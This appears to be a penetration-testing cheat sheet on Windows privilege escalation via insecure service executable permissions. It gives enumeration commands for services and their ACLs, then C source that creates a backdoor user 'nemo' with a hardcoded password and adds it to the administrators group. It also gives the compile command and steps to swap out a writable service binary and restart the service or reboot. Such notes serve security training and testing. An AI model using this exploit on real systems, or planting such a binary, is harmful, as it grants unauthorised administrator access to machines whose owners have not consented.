Insecure File Permissions

• Most often occurs in Program Files due to devs not locking down user files (Permission EVERYONE

• Check running services

  • wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"

  • Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

  • tasklist /svc

• Use icacls to check permissions

  • icacls "C:\Program FIles\Path\To\Service.exe"

• Create a malicious executable

#include <stdlib.h>
int main ()
{
int i;
i = system ("net user nemo PassyPass123! /add");
i = system ("net localgroup administrators nemo /add");
return 0;
}

• This would create a user called ‘nemo’ and add it to the admins group

• Compile the code

  • i686-w64-mingw32-gcc adduser.c -o adduser.exe

• Transfer to victim machine

• Move to the exact path of writeable executable with exact name

• Attempt to exploit by restarting the service

  • net stop <servicename>

• If that fails (Access Denied), test reboot ability

  • shutdown /r /t 0